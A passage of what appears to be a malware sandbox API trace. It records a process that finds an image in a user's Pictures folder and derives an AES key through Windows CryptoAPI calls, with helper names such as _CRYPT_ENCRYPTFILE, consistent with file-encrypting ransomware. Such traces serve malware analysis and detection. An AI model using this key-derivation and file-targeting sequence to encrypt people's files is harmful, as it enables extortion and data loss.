cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="czF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.464] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.464] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.464] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.464] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.465] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.465] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.465] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0x90ae18 [0188.465] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.465] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.465] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.465] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.466] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.466] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0188.467] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.467] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.467] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.468] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.468] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.468] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.468] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.468] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.469] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.469] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.469] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.469] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.469] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.469] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.470] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.470] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.470] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.470] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.470] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.470] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.475] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 